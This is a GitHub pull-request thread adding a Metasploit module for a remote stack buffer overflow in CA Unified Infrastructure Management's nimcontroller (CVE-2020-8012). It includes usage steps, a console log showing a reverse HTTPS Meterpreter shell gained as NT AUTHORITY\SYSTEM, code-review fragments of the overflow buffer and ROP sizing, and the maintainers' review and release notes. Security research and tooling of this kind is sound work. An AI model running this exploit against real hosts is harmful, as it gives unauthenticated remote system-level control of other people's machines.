CVE-2020-8010 & CVE-2020-8012
rapid7/metasploit-framework pull request #13875
Opened 2020-07-21 16:23 UTC by wetw0rk

### CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow

This module exploits a buffer overflow within the CA Unified Infrastructure Management nimcontroller. The vulnerability occurs in the robot (controller) component when sending a specially crafted directory_list probe. Technically speaking the target host must also be vulnerable to CVE-2020-8010 in order to reach the directory_list probe.

### Verification Steps

1. Install the CA UIM v7.80.3132 (nimsoftrobotXXX.exe)
2. Start `msfconsole`
3. Do `use exploit/windows/nimsoft/nimcontroller_bof`
4. Do `set RHOSTS <ip>`
5. Do `exploit`
6. Verify shell is opened and service is still accessible

```
msf5 exploit(windows/nimsoft/nimcontroller_bof) > options 

Module options (exploit/windows/nimsoft/nimcontroller_bof):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DIRECTORY  C:\              no        Directory path to obtain a listing
   RHOSTS     W.X.Y.Z          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      48000            yes       The target port (TCP)

Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     A.B.C.D          yes       The local listener hostname
   LPORT     8443             yes       The local listener port
   LURI                       no        The HTTP Path

Exploit target:

   Id  Name
   --  ----
   0   Windows Universal (x64) - v7.80.3132

msf5 exploit(windows/nimsoft/nimcontroller_bof) > exploit 

[*] Started HTTPS reverse handler on https://A.B.C.D:8443
[*] W.X.Y.Z:48000 - Executing automatic check (disable AutoCheck to override)
[*] https://A.B.C.D:8443 handling request from W.X.Y.Z; (UUID: rpsri4cm) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (A.B.C.D:8443 -> W.X.Y.Z:50980) at 2020-07-21 11:14:09 -0500
[*] W.X.Y.Z:48000 - Version 7.80 [Build 7.80.3132, Jun  1 2015] detected, sending directory_list probe

 Directory of C:\

 12/15/2019 06:24 PM  <DIR> $GetCurrent
 12/14/2019 01:41 AM  <DIR> $Recycle.Bin
 10/18/2019 05:55 PM  <DIR> Documents and Settings
 07/21/2020 10:15 AM  <DIR> pagefile.sys
 07/14/2020 03:41 PM  <DIR> PerfLogs
 06/10/2020 09:18 AM  <DIR> Program Files
 07/19/2020 01:37 PM  <DIR> Program Files (x86)
 07/14/2020 03:41 PM  <DIR> ProgramData
 12/15/2019 07:08 PM  <DIR> Recovery
 07/21/2020 10:15 AM  <DIR> swapfile.sys
 10/18/2019 04:04 PM  <DIR> System Volume Information
 12/15/2019 07:09 PM  <DIR> Users
 07/18/2020 02:20 PM  <DIR> Windows

[+] W.X.Y.Z:48000 - The target is vulnerable.

meterpreter > 
[*] Session ID 1 (A.B.C.D:8443 -> W.X.Y.Z:50980) processing AutoRunScript 'post/windows/manage/migrate'
[*] Running module against DESKTOP-JICNNRT
[*] Current server process: notepad.exe (1860)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 7472
[+] Successfully migrated into process 7472

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background 
[*] Backgrounding session 1...
msf5 exploit(windows/nimsoft/nimcontroller_bof) > set DIRECTORY C:\\Users\\
DIRECTORY => C:\Users\
msf5 exploit(windows/nimsoft/nimcontroller_bof) > check

[*] W.X.Y.Z:48000 - Version 7.80 [Build 7.80.3132, Jun  1 2015] detected, sending directory_list probe

 Directory of C:\Users\

 03/19/2019 12:02 AM  <DIR> All Users
 12/15/2019 07:14 PM  <DIR> Default
 03/19/2019 12:02 AM  <DIR> Default User
 03/18/2019 11:49 PM  <DIR> desktop.ini
 07/19/2020 01:37 PM  <DIR> REDACTED
 12/15/2019 09:07 PM  <DIR> Public

[+] W.X.Y.Z:48000 - The target is vulnerable.
```

2020-07-23 14:13 UTC, acammack-r7 commented on modules/exploits/windows/nimsoft/nimcontroller_bof.rb
> +        return CheckCode::Vulnerable
```suggestion
        return CheckCode::Appears
```

Since this only checks the version and doesn't trigger the overflow itself, we only have enough information to say `CheckCode::Appears`.

2020-07-23 14:17 UTC, acammack-r7 submitted a review, later dismissed
This looks neat, thanks! As much as I enjoy the endless range syntax from Ruby 2.6, we still have to support Ruby 2.5 for now, so these have to be converted to the more tradtional `[i..-1]` syntax.

2020-07-23 14:17 UTC, acammack-r7 commented on modules/exploits/windows/nimsoft/nimcontroller_bof.rb
> +      final = dirlist[index..]
```suggestion
      final = dirlist[index..-1]
```

We still have to support Ruby 2.5 which does not have the endless range syntax available.

2020-07-23 14:17 UTC, acammack-r7 commented on modules/exploits/windows/nimsoft/nimcontroller_bof.rb
> +      packet_args << "1\x00#{arg[i..].length+1}\x00"
```suggestion
      packet_args << "1\x00#{arg[i..-1].length+1}\x00"
```

2020-07-23 14:17 UTC, acammack-r7 commented on modules/exploits/windows/nimsoft/nimcontroller_bof.rb
> +      packet_args <<  "#{arg[i..]}\x00"
```suggestion
      packet_args <<  "#{arg[i..-1]}\x00"
```

2020-07-23 14:25 UTC, wetw0rk commented on modules/exploits/windows/nimsoft/nimcontroller_bof.rb
> +        return CheckCode::Vulnerable
Hmm, Is it ok if I add the appears if I do not get the listing? There was no patch for this version other than upgrading (If I remember correctly). So if you get the version + listing its guaranteed exploitable. Kinda like this:

```ruby
103       if list_check == 0
104         return CheckCode::Vulnerable
105       else
106         return CheckCode::Appears
107       end
108     end
```

The only thing stopping exploitation is access to the `directory_list` probe

2020-07-23 14:28 UTC, wetw0rk commented on modules/exploits/windows/nimsoft/nimcontroller_bof.rb
> +      final = dirlist[index..]
Ah ok that makes sense 😅, my ruby is rust-y lol

2020-07-23 14:42 UTC, acammack-r7 commented on modules/exploits/windows/nimsoft/nimcontroller_bof.rb
> +        return CheckCode::Vulnerable
While it's probably not an issue for this piece of software, a number of vendors have a history of silently backporting security fixes to old software without changing the version number. To help manage our end-users' expectations the policy is that anything that hasn't actually exploited the vulnerability in the check needs to return `Appears` to help avoid of the confusion of "it says `Vulnerable`, but I can't exploit it!"

2020-07-23 14:47 UTC, wetw0rk commented on modules/exploits/windows/nimsoft/nimcontroller_bof.rb
> +        return CheckCode::Vulnerable
Ok makes sense went ahead and pushed the changes 😄

2020-07-23 18:52 UTC, acammack-r7 commented on modules/exploits/windows/nimsoft/nimcontroller_bof.rb
> +        return CheckCode::Vulnerable
Thanks!

2020-07-24 13:47 UTC, smcintyre-r7 requested changes

2020-07-24 13:47 UTC, smcintyre-r7 commented on modules/exploits/windows/nimsoft/nimcontroller_bof.rb
> +      'Privileged'     => true,
> Successful code execution will result in a NT AUTHORITY\SYSTEM shell, even if exploitation fails the remote service will not crash. You should be able to exploit the service an unlimited amount of times.

Based on this, you should include:

```
      'Notes' => { 'Stability' => [ CRASH_SAFE ] },
```

2020-07-24 13:47 UTC, smcintyre-r7 commented on modules/exploits/windows/nimsoft/nimcontroller_bof.rb
> +    offset  = "\x41" * 1000
If this can be randomized, that would be helpful. There's a lot of static data in here but 1000 `A`'s is alot. You could instead use `Rex::Text.rand_text_alphanumeric(1000)` or `Rex::Text.rand_text_alpha_upper(1000)` if it has to be capital letters for whatever reason.

2020-07-24 13:47 UTC, smcintyre-r7 commented on modules/exploits/windows/nimsoft/nimcontroller_bof.rb
> +    rop_chain += "\x45" * (3500 - (   # ROP chain MUST be 3500 bytes, or exploitation WILL fail
Same for here and here, regarding randomizing some of the data.

2020-07-24 13:47 UTC, smcintyre-r7 commented on modules/exploits/windows/nimsoft/nimcontroller_bof.rb
> +        else
How about condensing this to:
```suggestion
        unless final[i].to_i > 0
```

2020-07-24 19:45 UTC, wetw0rk commented on modules/exploits/windows/nimsoft/nimcontroller_bof.rb
> +      'Privileged'     => true,
👀 nice ok will do

2020-07-24 19:45 UTC, wetw0rk commented on modules/exploits/windows/nimsoft/nimcontroller_bof.rb
> +    offset  = "\x41" * 1000
💯

2020-07-24 20:52 UTC, wetw0rk commented
not a fan of how rubocopy spaces it 🤮, but it is what it is 😂

2020-07-24 21:40 UTC, smcintyre-r7 commented
![image](https://user-images.githubusercontent.com/58950994/88435290-e315c300-cdcf-11ea-972d-f6c5757d8dca.png)

2020-07-30 16:04 UTC, smcintyre-r7 commented
So for testing this, I'm not sure where to get this "Install the CA UIM v7.80.3132 (nimsoftrobotXXX.exe)". I checked the link to [CA UIM](https://techdocs.broadcom.com/content/broadcom/techdocs/us/en/ca-enterprise-software/it-operations-management/unified-infrastructure-management/9-0-2/getting-started/ca-uim-overview.html) in your [docs](https://github.com/rapid7/metasploit-framework/pull/13875/files#diff-ccc69437177710f61bb3fb4fe7bea472R16) but: 1) it doesn't look like there's any reference to a `nimsoftrobotXXX.exe` and 2) it looks like you have to have a [support contract](https://techdocs.broadcom.com/content/broadcom/techdocs/us/en/ca-enterprise-software/it-operations-management/unified-infrastructure-management/9-0-2/installing/install-uim-server.html#concept.dita_30ed1e61357d530d730c2350ab23849b5d1726a0_DownloadtheUIMServerInstallPackage) to login and access the installers.

Can you confirm if that's correct and provide some clarification on if and how I can access the installer for testing this?

2020-07-30 16:13 UTC, bcoles commented
> 
> 
> So for testing this, I'm not sure where to get this "Install the CA UIM v7.80.3132 (nimsoftrobotXXX.exe)". I checked the link to [CA UIM](https://techdocs.broadcom.com/content/broadcom/techdocs/us/en/ca-enterprise-software/it-operations-management/unified-infrastructure-management/9-0-2/getting-started/ca-uim-overview.html) in your [docs](https://github.com/rapid7/metasploit-framework/pull/13875/files#diff-ccc69437177710f61bb3fb4fe7bea472R16) but: 1) it doesn't look like there's any reference to a `nimsoftrobotXXX.exe` and 2) it looks like you have to have a [support contract](https://techdocs.broadcom.com/content/broadcom/techdocs/us/en/ca-enterprise-software/it-operations-management/unified-infrastructure-management/9-0-2/installing/install-uim-server.html#concept.dita_30ed1e61357d530d730c2350ab23849b5d1726a0_DownloadtheUIMServerInstallPackage) to login and access the installers.
> 
> Can you confirm if that's correct and provide some clarification on if and how I can access the installer for testing this?

Software is not available as per https://github.com/rapid7/metasploit-framework/pull/13866#discussion_r457149417

2020-07-30 16:46 UTC, smcintyre-r7 commented
Thanks! I missed that PR for context. In that case, as was stated, we'll definitely need a PCap for demo purposes sent over to msfdev@metasploit.com (feel free to CC me directly at smcintyre@metasploit.com). I'll keep my eye out for it and once I've had a chance to review it, I can see about landing this PR.

2020-07-30 18:23 UTC, wetw0rk commented
@bcoles unfortunately you are correct you cannot get this software without contacting CA or Broadcom. I'm actually unaware of the exact download link as this software was just handed to me to begin research on. You can find more research on this protocol here:

https://github.com/wetw0rk/CA-UIM-Nimbus-Research

Went ahead and shot you an email @smcintyre-r7 lemme know if you guys need anything else. Wish I could get you a copy but unfortunately cannot.

2020-07-31 13:09 UTC, merged

2020-07-31 13:12 UTC, smcintyre-r7 commented
After reviewing the PCap that was sent to the Metasploit developers mailing list, everything appears to be in order. I made a few minor changes to the docs per suggestions from `msftidy_docs` in commit 2fb89f47c2cce7be539999a41f5174043f31021e and have landed this module.

Thank you for this contribution @wetw0rk ! :tada: 

It's not every day I see a ROP chain for 64-bit Windows, so that's pretty cool.

2020-07-31 13:14 UTC, smcintyre-r7 commented
# Release Notes
This adds an exploit for an unauthenticated, remotely exploitable stack buffer overflow in CA Infrastructure Management monitoring agents prior to 9.20. This vulnerability is identified as CVE-2020-8012.

2020-07-31 13:20 UTC, wetw0rk commented
w00tw00t thanks man 🔥 🎊